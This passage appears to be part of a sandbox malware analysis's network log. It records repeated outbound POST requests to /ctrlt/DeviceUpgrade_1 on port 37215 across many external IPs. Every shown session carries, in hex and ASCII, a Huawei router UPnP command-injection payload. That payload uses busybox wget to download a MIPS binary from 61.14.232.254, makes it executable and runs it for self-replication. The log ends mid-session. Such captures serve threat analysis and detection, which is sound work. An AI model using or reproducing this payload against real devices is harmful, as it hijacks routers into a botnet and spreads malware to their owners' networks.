3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1959192.168.2.133431041.32.78.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684773922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1960192.168.2.1356630197.42.228.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684773922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1961192.168.2.1358214197.191.1.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684904099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1962192.168.2.1356364197.105.61.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684933901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1963192.168.2.133788041.170.155.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684967995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1964192.168.2.135354241.135.182.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684983015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1965192.168.2.1342452118.67.239.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685000896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1966192.168.2.136071441.248.81.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685022116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1967192.168.2.1349740157.76.113.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685060024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1968192.168.2.135858641.52.70.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685080051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1969192.168.2.1335626157.59.149.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685134888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
